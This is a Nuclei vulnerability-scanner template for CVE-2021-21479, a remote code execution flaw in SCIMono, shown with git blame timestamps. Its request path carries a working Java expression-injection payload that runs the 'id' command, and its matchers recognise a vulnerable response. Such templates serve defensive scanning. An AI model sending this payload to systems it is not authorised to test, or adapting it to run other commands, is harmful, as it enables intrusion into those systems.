nuclei-templates/http/cves/2021/CVE-2021-21479.yaml

48 lines
1.8 KiB
YAML
Raw Normal View History

2021-07-18 04:11:56 +00:00
id: CVE-2021-21479
info:
name: SCIMono <0.0.19 - Remote Code Execution
2021-07-18 04:11:56 +00:00
author: dwisiswant0
severity: critical
description: |
SCIMono before 0.0.19 is vulnerable to remote code execution because it is possible for an attacker to inject and
execute java expressions and compromise the availability and integrity of the system.
2023-09-27 15:51:13 +00:00
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the target system.
2023-09-06 12:09:01 +00:00
remediation: |
Upgrade SCIMono to version 0.0.19 or later to mitigate this vulnerability.
reference:
- https://securitylab.github.com/advisories/GHSL-2020-227-scimono-ssti/
- https://nvd.nist.gov/vuln/detail/CVE-2021-21479
- https://github.com/SAP/scimono/security/advisories/GHSA-29q4-gxjq-rx5c
- https://github.com/ARPSyndicate/cvemon
- https://github.com/ARPSyndicate/kenzer-templates
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H
cvss-score: 9.1
cve-id: CVE-2021-21479
cwe-id: CWE-74
epss-score: 0.00396
epss-percentile: 0.70798
2023-09-06 12:09:01 +00:00
cpe: cpe:2.3:a:sap:scimono:*:*:*:*:*:*:*:*
metadata:
max-request: 1
2023-07-11 19:49:27 +00:00
vendor: sap
product: scimono
2023-12-05 09:50:33 +00:00
tags: cve,cve2021,scimono,rce,sap
2021-07-18 04:11:56 +00:00
http:
2021-07-18 04:11:56 +00:00
- method: GET
path:
- "{{BaseURL}}/Schemas/$%7B''.class.forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('js').eval('java.lang.Runtime.getRuntime().exec(\"id\")')%7D"
2021-07-18 17:24:34 +00:00
2021-07-18 04:11:56 +00:00
matchers:
- type: word
2023-07-11 19:49:27 +00:00
part: body
2021-07-18 04:11:56 +00:00
words:
- "The attribute value"
- "java.lang.UNIXProcess@"
- "has invalid value!"
2021-07-20 08:48:21 +00:00
- '"status" : "400"'
2021-07-18 04:11:56 +00:00
condition: and
# digest: 490a0046304402206ead8da6ed59dfd823f42fde40909549d8186cccc35abe5b1b4b6aeadd90cdd102204e3126eea7c1aba8303c5b9ba3af98d0bd5b040b58a135c0044e04c00d4e5452:922c64590222798bb761d5b6d8e72950